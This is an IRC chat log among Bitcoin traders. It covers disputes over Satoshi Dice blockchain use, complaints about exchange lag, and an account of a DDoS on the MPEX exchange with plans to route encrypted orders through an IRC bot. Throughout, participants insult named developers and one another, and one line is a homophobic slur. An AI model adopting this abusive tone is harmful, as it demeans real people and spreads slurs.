19:41:22 i knew then that it's not the freaking government that'll be the issue on the midterm. Mar 07 19:42:46 yeah, I might give out my second neg rating to Luke-Jr Mar 07 19:43:37 why Luke-Jr ? Mar 07 19:43:55 all his nonsense about SD spamming the blockchain Mar 07 19:44:16 and the fact that he published some mining code that breaks protocol and promotes it to other miners. Mar 07 19:44:17 ya well, attention ho. Mar 07 19:44:27 retaliatory rating if some idiot negs you i can see Mar 07 19:44:36 going out of your way to politically rate people... meh. not so much. Mar 07 19:44:52 i dunno what to call it if I rate him down, but im tired of this shit. Mar 07 19:44:59 lol Mar 07 19:45:25 what difference does it make to you tho ? there's going to be an onion in any soup Mar 07 19:45:39 do you mind that it's called Luke-Jr or whatever else ? Mar 07 19:46:32 i can't articulate myself enough -- im just against all his SD blockchain spamming bullshit Mar 07 19:47:46 hey, most people are Mar 07 19:47:51 you'd rather see SD flood Bitcoin to death Mar 07 19:47:51 well... not as much against as amused. Mar 07 19:48:16 i've been reading all this btctalk stuff today, and he's just wrong about SD spamming. just because he'd design SD differently.... or believes that gambling is immoral because he loves jesus. Mar 07 19:48:23 Luke-Jr dude, still with this ? sd is the only thing happening on bitcoin, forget about it already. Mar 07 19:48:37 o, is it a loving bejezuz issue really ? Mar 07 19:49:01 if blockchain can't support SD now, what happen with 1M user ? Mar 07 19:49:06 no, it's a mod6-is-a-troll issue Mar 07 19:49:16 this wouldn't be by any chance related to the girl bitchslapping that hearn muppet earlier, would it ? Mar 07 19:49:16 im not trolling shit motherfucker Mar 07 19:49:22 error4733: 1M user with 1000 tx/sec is easier than 10 users with 1000 tx/sec Mar 07 19:49:23 all bs, erik is right, better now than to late Mar 07 19:50:12 1M user with 1000 tx/sec is easier than 10 users with 1000 tx/sec <<< you can't even distinguish users apart. Mar 07 19:50:14 error4733: 1mil users can provide infra for 1000 tx/sec; what we have today, no way Mar 07 19:50:23 i can make 1mn txs right now, you won't be able to produce an accurate usercount. Mar 07 19:50:36 mircea_popescu: it's easy. just go to #bitcoin and ask SD players to PM you. Mar 07 19:50:48 hahaha, if you think retail users will run that braindamaged abomination called "the bitcoin client" you're off your rocker. Mar 07 19:52:31 if there were 1mn users drawn to bitcoin because of satoshi dice, they'd just run piuk's wallet into the ground, and you'd whine about how "blockchain is spamming the network" Mar 07 19:52:50 this sort of internecine bullshit may be appropriate in fringe churches of weird and other midwestern concerns Mar 07 19:52:59 but it does not belong in technology. technology is for smart people. Mar 07 19:52:59 I don't care who it is, if they flood the network it's miners' job to filter them out Mar 07 19:53:10 you literally have no idea what you are talking about. Mar 07 19:53:13 mircea_popescu: you'd better leave then Mar 07 19:53:29 after all, technology is for smart people.. Mar 07 19:53:48 not anarchist lunatics who can't figure out the most obvious legal scenario Mar 07 19:53:55 lmao Mar 07 19:54:14 smh Mar 07 19:54:16 listen, how do you figure you're a mioner anyway Mar 07 19:54:29 best i can make out you're a concern troll with a checkered past. Mar 07 19:54:44 [MPEX] [S.MPOE] 4298 @ 0.00072873 = 3.1321 BTC [-] Mar 07 20:01:42 looking through the forum digests this is motherfucking sad Mar 07 20:01:53 i mean seriously Mar 07 20:02:23 Gateway capacity trouble at Coinbase? Is anyone else having problems with Bitme deposits? Mt.Gox Payment system problem What the fuck Bitfinex? MtGox should halt trading when Order Lag time is this long. Anyone's bitfloor deposits working? Mar 07 20:02:28 it's like fucking extravaganza. Mar 07 20:02:36 and the cherry on top, Website performance is going to be the bane of many n00bs when it's time to sell Mar 07 20:02:56 dude i dunno about noobs. it'd be the bane of me. Mar 07 20:03:44 bugpowder and I were all jammed up about goxlag of 10 minutes Mar 07 20:04:08 it was a learning opportunity Mar 07 20:04:13 heh. i think the lag reporting was laggy Mar 07 20:04:24 heheh Mar 07 20:04:29 at some point they were pasting half hour old trades out of order into the feed Mar 07 20:04:41 classical meltdown. Mar 07 20:04:51 actually it looked a lot like nasdaq when facebook. Mar 07 20:04:55 lol goxlag Mar 07 20:06:44 what are people using for cli? is it faster? Mar 07 20:07:09 mircea_popescu , is there any place for mpex chinese/pakistani users to inquiry about the outage? Mar 07 20:07:28 jurov here basically. Mar 07 20:07:29 one dude came and seemd completely out of his mind Mar 07 20:07:43 have him join the chan it can be explained to him. Mar 07 20:07:47 which one? Mar 07 20:07:57 Rick___? Mar 07 20:08:03 yes. he's gone now. Mar 07 20:08:10 awww that poor dude was sending me crazed messages too. Mar 07 20:08:52 but to sum up the situation, cause i imagine many people are curious : Mar 07 20:09:24 mpex consists of a trade server and webservers which the users talk to. Mar 07 20:09:39 if you look at it practically these webservers are practically proxies. Mar 07 20:09:57 there is five of them sharing two gigabit uplinks through a balancer. Mar 07 20:10:31 the first time mpex was ddosed in january the attack took out the actual datacenter top level router. Mar 07 20:10:47 there were two more layers of routing to get to the router that handled the webservers. Mar 07 20:11:10 now, the reason admittedly was that the thing was a little old and kidna loaded. but still. Mar 07 20:11:35 so at that time i split the tubes up north/east, and started a bunch of proxies Mar 07 20:11:46 jurov was hosting one, for instance. Mar 07 20:12:12 since the attack started yesterday a total of 100+ of these were taken offline. Mar 07 20:12:26 granted, it's not easy to blow up a small shared setup like that. Mar 07 20:12:45 but somebody did have the determination to spend a day and a half looking for them, setting up the ddosing for them individually bla bla. Mar 07 20:13:21 the thing with that system is that it works by division. if there's 100 of them there jurov can stay online. Mar 07 20:13:31 if there's 9 left the remainder ddos is available to hit him Mar 07 20:13:50 i could allow anyone to start a proxy right now, the trade server is fine, etc. the problem is Mar 07 20:14:02 you'd be nuked in half an hour or something, and it's just hassle. Mar 07 20:14:29 mmm, shake n bake Mar 07 20:14:32 right. Mar 07 20:14:43 now, a humongo 10gb dedicated solution is being set up as we speak Mar 07 20:14:56 i had this sort-of prepared, but not actually provisioned and ready because the shit is expensive Mar 07 20:15:19 so you're having more babies to win the war? Mar 07 20:15:23 basically. Mar 07 20:15:40 heh Mar 07 20:15:44 imsaguy the alternative is handle mpex trades by email. Mar 07 20:15:56 email, the original next generation mail queue Mar 07 20:16:00 yep. Mar 07 20:16:02 how about mpex trades via telnet? Mar 07 20:16:08 :D Mar 07 20:16:08 to what ip ? Mar 07 20:16:15 see, mail is diffuse. Mar 07 20:16:16 127.0.0.1 Mar 07 20:16:18 lol Mar 07 20:16:18 I wonder if that makes uunet the original original message queue Mar 07 20:16:23 Diablo-D3 prolly. Mar 07 20:16:30 how about mpex over irc? Mar 07 20:16:35 fuck we need uunet back Mar 07 20:16:40 that shit was baus Mar 07 20:16:44 let freenode get ddos Mar 07 20:16:47 I hear they like that Mar 07 20:16:49 imsaguy the problem is irc doesn't handle pgp so well Mar 07 20:16:58 yes it does Mar 07 20:17:00 ask gribble Mar 07 20:17:00 (and i don't think they have enough to cope, but maybe) Mar 07 20:17:00 I could name a box "chicks" and name a user "i" Mar 07 20:17:01 :) Mar 07 20:17:02 and it'd be funny Mar 07 20:17:18 people pastebin the pgp Mar 07 20:17:22 feed the bot the raw url Mar 07 20:17:24 simple as pie Mar 07 20:17:24 imsaguy yeah. last i talked to nanotube he was like "i don't want this in production handling opm" Mar 07 20:17:34 I'm not saying graft onto gribble Mar 07 20:17:37 I'm saying clone Mar 07 20:17:43 steal the concept Mar 07 20:17:44 dawg... Mar 07 20:17:52 fuck you srsly. Mar 07 20:17:55 why didn't i think opf that Mar 07 20:17:57 dee oh gee Mar 07 20:18:05 people can just paste a pastebin link or w/e Mar 07 20:18:06 oh em gee Mar 07 20:18:13 derp Mar 07 20:18:20 lol Mar 07 20:18:28 and then the bot filters anything not formed as url Mar 07 20:18:31 thats the first line Mar 07 20:18:35 imsaguy wanna code an irc proxy for me ? Mar 07 20:18:37 second line is it only parses text Mar 07 20:18:41 mircea_popescu: dude, just use perl Mar 07 20:18:48 all you have to do is take urls from people and feed them into server as pgp strings Mar 07 20:18:50 no, just fork gribble Mar 07 20:19:02 so fork gribble, i dun care. Mar 07 20:19:06 the code for reading pastebin to gpg Mar 07 20:19:11 its already written Mar 07 20:19:20 im trying to hire you over here ;/ Mar 07 20:19:27 what's it pay? Mar 07 20:19:30 gypsie man Mar 07 20:19:30 pm. Mar 07 20:20:57 waitwhat? ppl will publish urls to encrypted orders on irc to be picked up by mpoe bot? Mar 07 20:22:05 jurov yup Mar 07 20:22:12 i like this chan, srsly. Mar 07 20:22:18 ppl are facepalming left and right around me Mar 07 20:22:20 working on it now Mar 07 20:24:22 lol you should accept clearsigned orders, too, then. Mar 07 20:24:27 unencrypted Mar 07 20:24:44 moar phun Mar 07 20:25:04 nah. Mar 07 20:28:44 mircea_popescu: Can I help you guys with the infrastructure for the site? Mar 07 20:28:53 so coinbr and mpex are down? Mar 07 20:29:03 wiggzz atm, yes. Mar 07 20:29:16 Chilca do you have a gb+ pipe you can play with ? Mar 07 20:29:17 ok. no worries, thanks Mar 07 20:29:39 mircea_popescu: are you having a DDOS attack? what's the problem. Mar 07 20:29:50 yes. read up the chat i just explained it 5 minutes ago Mar 07 20:29:56 let me read it Mar 07 20:29:59 o you just joined huh. brb pastebin Mar 07 20:30:29 I just joined. Pastebin will be great Mar 07 20:30:40 Any paste or usage pattern not related to that goal which results in unusually high traffic will be flagged for investigation. Mar 07 20:30:51 this could become a problem Mar 07 20:31:05 mod6 they can use their own domains tho Mar 07 20:31:11 as well, is it a good idea to store everyones cyphertexts indefinately? Mar 07 20:31:15 http://pastebin.com/8dWy851p Chilca wiggzz Mar 07 20:31:17 yes thank you my vps is fubar Mar 07 20:31:39 bee tee double you Mar 07 20:31:43 mod6 now that i don't know. Mar 07 20:32:03 but if someone breaks pgp in 2049, what do they get ? a lot of BUY|S.BLABLA|350|45000 ? Mar 07 20:32:31 jcpham y-double-y-cum. Mar 07 20:32:45 switzerland is down Mar 07 20:32:49 too many bandwidths Mar 07 20:32:56 angry netizens Mar 07 20:33:14 yea. i just figure maybe having our asses hanging in the breeze is a great oppertunity for the NSA to try to extract data on a sort of chosen cypertext attack Mar 07 20:33:29 that why you expire the pastebin Mar 07 20:33:36 it only needs to live for <10 minutes Mar 07 20:33:39 mod6 listen, the pastebins would be encrypted with mpex key Mar 07 20:33:42 ok imsaguy, that should work Mar 07 20:33:44 if they get anywhere they broke pgp. Mar 07 20:33:51 because Mar 07 20:33:58 you can take a string and encrypt it with mpex key right now Mar 07 20:33:59 locally Mar 07 20:34:01 jcpham, now imagine they could have started resolving it 6 hours earlier Mar 07 20:34:03 for one trillion times Mar 07 20:34:17 jurov no cause i was sleeping. Mar 07 20:34:17 if namworld was able to remember that coinbr in on bitvps Mar 07 20:34:30 *nod* im with you. Mar 07 20:34:32 and contrary to what everyone thinks, great ideas also need sane management to get anywhere. Mar 07 20:34:48 mircea i'm speaking about bitvps to jcpham Mar 07 20:34:54 o i got confused :D Mar 07 20:34:57 sorry. Mar 07 20:35:23 sorry jurov Mar 07 20:35:31 can't get over it... namworld said "o mpex.coinbr.com has problems, prolly ddos" and he went to sleep Mar 07 20:35:36 lol Mar 07 20:35:40 my opinion of switzerland is that it is not for critical stuff Mar 07 20:35:44 wasn't exactly like that lol Mar 07 20:35:46 despite i did tell him it's to be expected Mar 07 20:36:06 im not even sure I ever noticed the pastebin expire time lol Mar 07 20:36:37 do you guys have a firewall on top the servers? Mar 07 20:36:40 this is a pretty sweet idea tho imsaguy Mar 07 20:36:42 lol Mar 07 20:36:49 Chilca, first ddos? Mar 07 20:37:02 mod6, I'm pretty stupid, most of the time Mar 07 20:37:08 but the rest of the time, I try to make up for it. Mar 07 20:37:10 naw Mar 07 20:37:15 werd :) Mar 07 20:37:26 imsaguy: In my company we use radware to stop ddos. Mar 07 20:37:59 I can talk with the CEO and he can ship one to your dc if you want. Mar 07 20:38:03 for free Mar 07 20:39:14 that's a nice thought, but Mar 07 20:39:25 its hosted out of his bedroom Mar 07 20:39:33 in the middle of installing gear so might not be the best time Mar 07 20:39:33 I doubt you want in that dungeon Mar 07 20:42:02 [HAVELOCK] [SDICE] 1 @ 0.42424242 BTC [+] Mar 07 20:43:00 we've found out that it is indeed coinbr.com being ddos'ed Mar 07 20:43:40 we've shut it all down, working on restoring everyone else, please be patient Mar 07 20:43:47 oh my Mar 07 20:43:53 dudes not paying attention are they. Mar 07 20:44:18 yea, after 8 hours Mar 07 20:45:39 i could've told them coinbr was going to get ddos'd yesterday Mar 07 20:45:51 it seems like maybe you attemtped to notify them Mar 07 20:46:06 i told namworld myself. but he's just not the right person for that. Mar 07 20:46:19 !mpex url email Mar 07 20:48:04 [HAVELOCK] [SDICE] 20 @ 0.495 = 9.9 BTC [+] Mar 07 20:49:02 [HAVELOCK] [SDICE] 3 @ 0.5 = 1.5 BTC [+] Mar 07 20:49:22 ;;ticker Mar 07 20:49:23 BTCUSD ticker | Best bid: 42.50001, Best ask: 42.69899, Bid-ask spread: 0.19898, Last trade: 42.50001, 24 hour volume: 174284.00806825, 24 hour low: 33.30000, 24 hour high: 48.40000, 24 hour vwap: 41.65273 Mar 07 21:17:55 mircea_popescu: should be pretty trivial to set up an irc bot that just takes user input and passes it along to your server. if you set it up with a cloak, attackers can't even know its ip. Mar 07 21:18:10 so they'd have to take down all of freenode. Mar 07 21:18:34 and if you use gribble/supy as base, it by default limits number of commands per user per time, so they can't even flood it out. Mar 07 21:18:59 nanotube, imsaguy is on it Mar 07 21:19:38 jurov: ah cool :) Mar 07 21:22:36 nanotube: pgp over irc Mar 07 21:22:38 PITA Mar 07 21:22:42 :) Mar 07 21:23:50 imsaguy: heh well, just have it take a pastebin link, and pass it along to mpex. Mar 07 21:23:53 should be trivial Mar 07 21:24:07 but then mpex passes pgp back :p Mar 07 21:24:13 thats the poitn of ddos Mar 07 21:24:25 well, mpex passes back another pastebin link Mar 07 21:24:27 easy peasy Mar 07 21:24:31 unless they ddos pastebin.com Mar 07 21:24:38 :) Mar 07 21:24:41 but there are so many pastebins out there, you can easily cycle among them Mar 07 21:24:58 they all use captcha Mar 07 21:25:13 PASTEBINCLOUD Mar 07 21:25:15 lawlz Mar 07 21:25:15 nanotube it shall be done. Mar 07 21:25:17 some provide apis for pasting. like paste.debian Mar 07 21:25:18 sounds like the shit devcoin does Mar 07 21:25:43 this of course has no bearing on the new pipe coming online. Mar 07 21:25:44 mircea_popescu: make sure to have the bot communicate with another secret proxy, not core server. so if bot is cracked open, they only discover one of your proxies, not real location. Mar 07 21:25:49 pastebin.com was hosed yesterday Mar 07 21:25:53 nanotube yes. Mar 07 21:26:09 also, another option, mircea_popescu : set up an amazon ec instance. they give you unlimited BW, only care about disk and cpu usage. Mar 07 21:26:19 so if all it does is take requests and pass them on Mar 07 21:26:27 you don't have to pay Mar 07 21:26:31 (much) Mar 07 21:26:38 the cpu can get costly if its being bogged Mar 07 21:26:43 nanotube a coupla of the proxies were on amazon Mar 07 21:26:46 amazon ec, exactly what i'm doing. cool shit. Mar 07 21:26:58 hmm Mar 07 21:27:00 im too busy to investigate exactly wtf happned to them right now Mar 07 21:27:03 [HAVELOCK] [SDICE] 19 @ 0.51 = 9.69 BTC [+] Mar 07 21:27:04 heh ic Mar 07 21:27:08 and not sure i actually care. Mar 07 21:27:17 anyway, imsaguy let know if you need help. :) Mar 07 21:29:50 mircea_popescu: keep your friends close... might want to sort out who/what this was Mar 07 21:29:55 help protectin the future. Mar 07 21:30:03 deadweasel nah, i literally do not care. Mar 07 21:30:20 understand : this was planned for. sooner or later someone was going to attack mpex. Mar 07 21:30:23 i can tell, fuckin' Rick James up in here Mar 07 21:30:28 proving that mpex can't be effectually attacked is part of the game Mar 07 21:30:28 I'm Rich Bitch! Mar 07 21:30:34 the attackers are on our team here. Mar 07 21:30:45 deadweasel, how would you do it? it can be half of btctalk Mar 07 21:31:03 Hell, anyone not expecting this attack at some point was not paying attention Mar 07 21:31:19 jborkl the only disputer was, "will it be government or not" Mar 07 21:31:24 turns out not. so... heh. Mar 07 21:31:37 i don't know how to do it. Mar 07 21:31:42 i probably wouldn't care either. Mar 07 21:31:47 just the fact that traders could close > 50k btc worth of option positions normally whiole mpex was being ddosed to hell Mar 07 21:31:51 already speaks volumes. Mar 07 21:31:55 yeah, a few months ago Bank of America got ddos for I think 3 days Mar 07 21:32:01 that the bot later was w/o a feed cause mtgox went bananas is a diff story Mar 07 21:32:10 but pain was avoided here. Mar 07 21:32:14 it was interesting to watch people show up here, get a proxy addy, then go trade. Mar 07 21:32:32 they were all jibberred up, then like, ok, i'm ok now. Mar 07 21:32:38 cool, huh ? Mar 07 21:32:54 this was a really good test for MPEX Mar 07 21:32:55 very Mar 07 21:33:11 there are no problems, only opportunities Mar 07 21:33:25 yeah, sure, i'm not keeping 10k worth of pipe as a hot and ready to go backup, i admit Mar 07 21:33:32 on the other hand, i am getting it deployed, so. Mar 07 21:33:42 mp, they ask something ? Mar 07 21:34:00 not afaik. Mar 07 21:35:26 ugh, the discussion on the forums is so fucking silly Mar 07 21:35:42 its like they don't understand what "free market" means Mar 07 21:35:58 i don't think they understand a lot of things tbh Mar 07 21:36:20 i literally saw someone say "sdice actually gets the gambler to pay MORE fees, they should be banned" Mar 07 21:36:46 some people were on a kick of "bitbet should charge less" Mar 07 21:36:47 why ? Mar 07 21:36:52 well... cause then it'd be less. Mar 07 21:36:57 im like... yaok. Mar 07 21:37:21 99% of all people are retarded Mar 07 21:37:25 yes, because the miners should get less money? not to mention the fact that it's about people enjoying and using bitcoins...so you will take away a popular service to further your cause? Mar 07 21:37:33 fucking retarded Mar 07 21:37:47 somewhere between the two "e" in free market, there is tiny subscript begging for gubment oversight Mar 07 21:38:21 anyway, exciting stuff Mar 07 21:38:22 mjr_: they're probably arguing the wrong thing but factually SD using the blockchain for accountign is retarded Mar 07 21:38:24 thy name be bitcoin Mar 07 21:38:44 dub mpex uses the blockchain for accounting a different way. Mar 07 21:38:52 dub: if they include fees fuck what they use it for Mar 07 21:38:54 this is what the blockchain is : accounting Mar 07 21:38:54 mjr_: sanest comparison I've seen was from this channel, imagine a casine where you had to cash out and back in after every bet Mar 07 21:38:57 that's why it's called a ledger. Mar 07 21:39:14 dub : accounts DO NOT WORK. Mar 07 21:39:20 there is no such thing as "an account" Mar 07 21:39:24 there is no such thing as "log in" Mar 07 21:39:28 forget that braindamage. Mar 07 21:39:46 yep it is only transactions Mar 07 21:40:03 although i can see your point about cashing in and out... Mar 07 21:40:08 and i think it is a good image Mar 07 21:40:14 the reason you cash out after every bet is that there's no "you" Mar 07 21:40:22 i would think of it as...does the casino not calculate your payout after each hand? Mar 07 21:40:40 you put money in, and then they push money back at you Mar 07 21:40:52 thinking in terms of "you" and pretending to be involved in bitcoin is the ultimate lulz. Mar 07 21:40:58 obviously it didn't sink in what bitcoin is. Mar 07 21:41:44 mircea: to be fair, i don't think that the protocol EXCLUDES the use of a layer on top of it that could replicate "accounts"... Mar 07 21:41:45 the blockchain is not intented for this level of nanotransactions Mar 07 21:41:57 mjr_ the protocol doesn't exclude it Mar 07 21:42:04 but im motherfucking excluding it. it doesn't work. Mar 07 21:42:11 yes, that makes sense Mar 07 21:42:14 if you had to pay for every grain of rice you bought individually with a CC, amex would crumble too Mar 07 21:42:24 dub this is great. Mar 07 21:42:34 the day we go in the marketplace with a workable solution that would crtumble amex Mar 07 21:42:44 is the day we see usd/satoshi rates quoted Mar 07 21:42:48 instead of usd/btc Mar 07 21:43:13 Who said the blockchain is only for a certain transaction? Mar 07 21:43:22 dub: i feel that what they are saying is that "the blockchain shouldn't be used for individual grains of rice, so no rice for anyone" Mar 07 21:43:25 moreover, who the fuck said what the blockchain is for ? Mar 07 21:43:28 who decided this nonsense Mar 07 21:43:28 jborkl: its design Mar 07 21:43:30 the blockchain is for everything it works for. Mar 07 21:43:30 derp Mar 07 21:43:38 as long as it's useful for something, that's what it's for. Mar 07 21:43:39 i agree Mar 07 21:43:40 natural law. Mar 07 21:43:46 it is like the internet Mar 07 21:43:48 making it take up an unrealistic amount fo resource is goign to break it Mar 07 21:44:02 then those people will quit Mar 07 21:44:03 dub the only thing that's going to break it is pseudo-governmental posturing. Mar 07 21:44:04 what is the internet "designed" for? so university professors could share scholarly work Mar 07 21:44:06 driving fees up to counter the problem is goign to kill adoption Mar 07 21:44:20 m/join #bitcoin Mar 07 21:44:22 nobody has license to come out with the sort of bullshit "shoulds" Mar 07 21:44:28 FUDGEPACKER Mar 07 21:44:36 the only shoulds here are the devs should stfu and fix bitcoind. Mar 07 21:44:36 mjr_: yes and 'the internet' has fundamentally changed a few times to cope with scaling Mar 07 21:44:40 i think that there is what IS...what the market has decided Mar 07 21:44:49 dub: as will bitcoin Mar 07 21:44:58 dub are you Luke? cause this sounds like his stupid logic Mar 07 21:45:10 jborkl i think he's trying to make sense of that position. Mar 07 21:45:10 jborkl: fuck you :) Mar 07 21:45:12 think about it this way Mar 07 21:45:16 only biblethumperrs can use bitcoin Mar 07 21:45:18 pretty sure dub and Luke-Jr are same person Mar 07 21:45:24 jcpham troll. Mar 07 21:45:28 there is nothing stopping miners to band together and block whatever traffic they want to Mar 07 21:45:31 you're grubles Mar 07 21:45:42 so if it is so important, they will Mar 07 21:45:43 how did you figure it out mircea_popescu Mar 07 21:45:44 mjr_: yes there is, economic incentive Mar 07 21:45:44 mjr_ and yet nobody mines at elegius Mar 07 21:45:54 lol Mar 07 21:45:55 jcpham i looked in the colon Mar 07 21:45:58 LOL Mar 07 21:46:07 dead pool Mar 07 21:46:07 exactly, the free market has decided that sdice is a good thing Mar 07 21:46:08 rectal exam, eh Mar 07 21:46:09 so it is Mar 07 21:46:18 there is no such thing as free market Mar 07 21:46:26 there are all our individual choices Mar 07 21:46:27 dub now there is. Mar 07 21:46:29 in aggregate Mar 07 21:46:34 implying no such thing as free will Mar 07 21:46:46 to have a free market you need informed players Mar 07 21:46:47 the point is that no one can say "i want to shape the future of bitcoin" Mar 07 21:46:52 no you don't Mar 07 21:47:02 you just need players Mar 07 21:47:14 sexy playas Mar 07 21:47:14 that is like saying "in natural selection you can only have fast deer" Mar 07 21:47:17 That is fucking stupid to say, you only need participants Mar 07 21:47:23 the only free market i know of is freicoin Mar 07 21:47:24 we know from the abject failure of capitalism that there are not enough informed players to make it work Mar 07 21:47:31 hmmm yes Mar 07 21:47:31 mining is the same Mar 07 21:47:39 dub the only reason capitalism failed was because idiots with "should" abandoned it Mar 07 21:47:42 to make "a better version" Mar 07 21:47:45 obviously america has not gotten a stranglehold over the world Mar 07 21:47:50 it hasn't worked for them AT ALL Mar 07 21:47:51 the soviet union, the united soviets of america, the blabla Mar 07 21:48:06 as long as people submit to natural law the take over the world. Mar 07 21:48:08 you cant inflate bitcon 10 million percent now can you Mar 07 21:48:12 mjr_: its not scaling Mar 07 21:48:13 bitcoin Mar 07 21:48:14 i'm pretty sure the united nations is an illuminati sect Mar 07 21:48:14 as soon as they start thinking they know what *should* be what Mar 07 21:48:15 for anyone to say that the people who came up with this system didn't get what they want is retarded Mar 07 21:48:16 ... blamo Mar 07 21:48:48 that is the point, if what you think "should" happen, then if it really should, it will...if it shouldn't it won't Mar 07 21:48:52 Kim Dotcom is Satoshi Nakamoto in .... Point Break Mar 07 21:49:03 because if the majority agree...they do it, if they don't, you were wrong Mar 07 21:49:11 the majority don't agree Mar 07 21:49:20 the majority are not capable of participating Mar 07 21:49:25 the majority with money agree, the rest dont count Mar 07 21:49:25 um...the fact that sdice transactions are included begs to differ Mar 07 21:49:27 because they are stupid Mar 07 21:49:37 irrelevant Mar 07 21:49:44 the are included now sure Mar 07 21:49:45 they verify the transactions Mar 07 21:49:52 the majority with money agree, the rest dont count << this guy is mircea_popescu Mar 07 21:49:59 so if the market decides to stop then they are right Mar 07 21:50:18 the market wont decide to stop because teh mining 'market' is not informed Mar 07 21:50:23 this has been shown plenty of times Mar 07 21:50:27 ok...so it is not important to them to stop this Mar 07 21:50:32 if it were Mar 07 21:50:33 it will take a technical probelm to change them Mar 07 21:50:34 they would Mar 07 21:50:41 which is hwat is happening Mar 07 21:50:42 ok, so let one come, and then they will adjust Mar 07 21:50:47 i see no problem Mar 07 21:50:53 transactions still working Mar 07 21:51:00 lol the old holdout of marauding socialism Mar 07 21:51:10 sure if you accept that 6 confs doesnt take an hour anymore Mar 07 21:51:14 "the poor aren't voting to steal from the rich because they've not been sufficiently explaining the benefits of theft" Mar 07 21:51:18 seriously, why does everyone feel the need to nurture something that is bigger than them and smarter Mar 07 21:51:21 "we gotta go out there and really inform them" Mar 07 21:51:23 bitcoin adoption as a whole may not accept that Mar 07 21:51:32 is atlas in here right now Mar 07 21:51:41 is that what just happened Mar 07 21:51:56 my point is that everyone votes with their mining power Mar 07 21:52:04 were people asleep yesterday? Mar 07 21:52:12 did you notice it took all day to send coin? Mar 07 21:52:17 only one person filters SD transactions that I know of, and his pool is dying Mar 07 21:52:27 dub i got my txns in before noon central Mar 07 21:52:28 exactly Mar 07 21:52:28 no delays Mar 07 21:52:33 jborkl to be fair, they've been fading for a while Mar 07 21:52:38 true Mar 07 21:52:53 dub because of sdice ? Mar 07 21:52:57 His point of view caused that Mar 07 21:53:00 mircea_popescu: yes Mar 07 21:53:04 oh get out Mar 07 21:53:08 it was a small day for s.dice Mar 07 21:53:22 this incidentallty shows clearly how misplaced all the sd trolling is. Mar 07 21:53:39 mircea_popescu: they raised their fee, pushing all their usually slow confirming txn to the front of the queue Mar 07 21:53:40 the network works fine with sd. what it doesn't work fine with is the appalingly poor quality of coding Mar 07 21:53:45 The new bitcoin client .8, uses all cpu cores correct- where .7 only used one? Mar 07 21:53:55 jarpiain jborkl jcpham JimmyHo2 jurov JWU42 Mar 07 21:53:58 mircea_popescu: it was teh tipping point for block size limit Mar 07 21:53:58 jborkl i think so Mar 07 21:54:10 so, as people upgrade clients- transactions get passed faster Mar 07 21:54:11 dub for the arbitrarily stupid 250k block limit baked in Mar 07 21:54:21 by the sort of idiots that also broke the way bitcoind creates txns Mar 07 21:54:29 ok so we're back to the scaling argument Mar 07 21:54:30 I changed my client to 500, it took like 5 seconds Mar 07 21:54:32 basically, bitcoin needs actual devs. Mar 07 21:54:32 no. Mar 07 21:54:47 most of the people who had bitcoin for no reason are out, thanks to pirate and the other scasmmers Mar 07 21:54:54 anyways, i just am tired of hearing about what people "should" do Mar 07 21:54:59 the problem is most of the people who think they're devs for no reason aren;t out yet. Mar 07 21:55:02 but it will filter out. Mar 07 21:55:21 people like gmaxwell, hearn, luke etc are just dead weight Mar 07 21:55:23 that is very much part of the problem Mar 07 21:55:29 too stupid to realise how stupid they actually are Mar 07 21:55:33 taaki is already gone, Mar 07 21:55:36 they're next Mar 07 21:55:38 and so it goes. Mar 07 21:55:42 i don't think they are stupid necessarily Mar 07 21:55:45 but is it easier to replace teh dev team or get SD to implement their own ledger Mar 07 21:55:52 i just think they are used to systems where they are in charge Mar 07 21:55:53 dub you always remove the broken thing Mar 07 21:56:00 you never fix the easy thing to "fix" Mar 07 21:56:01 bullshit Mar 07 21:56:02 you are trying to control one thing, what aboput the next thing Mar 07 21:56:05 no, it's how it works. Mar 07 21:56:10 jesus Mar 07 21:56:18 dub there's no dealmaking here. Mar 07 21:56:19 that is laughable Mar 07 21:56:21 if they suck they go Mar 07 21:56:58 i am just saying, if you have the mining hardware, then your thoughts on this (actually your actions) may matter...no one else's opinion really does Mar 07 21:57:51 https://bitcointalk.org/index.php?topic=130117.msg1596786#msg1596786 Mar 07 21:57:55 jurov is rthat you ? Mar 07 21:57:57 or do they mean me ? Mar 07 22:00:19 mjr__: I'm not suggesting miners will exclude SD Mar 07 22:00:27 i take it you don't like the Soft BP? Mar 07 22:00:45 I am just tired of hearing about how bad sdice is Mar 07 22:01:03 let's see...provided successful model for crowdsourcing anonymously? check Mar 07 22:01:14 and romantic ideals aside, this is really just a question of, will the everyman use bitcoin if its p2p'ness goes away Mar 07 22:01:23 gave a lot of publicity to bitcoin? check Mar 07 22:01:37 brought in users? check Mar 07 22:02:15 personally I think the problem will be solved differently Mar 07 22:02:33 but there is a scaling problem due to SD, you can't argue against that Mar 07 22:03:00 dub sd exposed bad coding in the bitcoin base. Mar 07 22:03:04 i can agree with that much. Mar 07 22:03:12 then again every practical use of prototype code will expose bad code Mar 07 22:03:16 it's the fucking point Mar 07 22:03:31 the idea is to take the correct dev attitude "o sorry we eat c0x. working to fix" Mar 07 22:03:40 rather than the incorrect dev attitude of "so don't do that!" Mar 07 22:03:49 burnside you around Mar 07 22:04:41 mpex.co is eating c0x, no? Mar 07 22:09:26 Lyspooner yes. Mar 07 22:09:48 that's the attitude! Mar 07 22:09:55 now where was that pastebin Mar 07 22:10:01 you see how it's done, people? Mar 07 22:10:22 Lyspooner http://pastebin.com/8dWy851p Mar 07 22:10:28 you missed out on all the fun Mar 07 22:10:33 oh nice Mar 07 22:10:40 mt gox finally got their websockets back up Mar 07 22:10:57 ! help Mar 07 22:11:10 hmm Mar 07 22:11:16 no space mobphone Mar 07 22:11:19 !help Mar 07 22:11:20 List of commands: Mar 07 22:11:21 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 07 22:11:46 !ticker mpoe s.dice Mar 07 22:11:46 The round stones beneath the earth... have spoken through the fire. Mar 07 22:11:46 !ticker mpex Mar 07 22:11:47 These beans is shit. Mar 07 22:12:11 !ticker mpoe Mar 07 22:12:12 You cannot stop the clouds by the building of a ship. Mar 07 22:12:20 !ticker s.mpoe Mar 07 22:12:21 Um, shouldn't you be with your own tribe or somethin'? Mar 07 22:12:29 the correct syntax is !ticker m s.mpoe, but assbot is not talking to mpex atm. Mar 07 22:12:34 !ticker havelock Mar 07 22:12:34 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Mar 07 22:12:51 hmm Mar 07 22:12:51 mircea_popescu: so in a free market world, you should be joining the foundation, lobbying for and funding your own devs to correct the problem Mar 07 22:13:10 if it was worth his time or if he found it worthwihle Mar 07 22:13:17 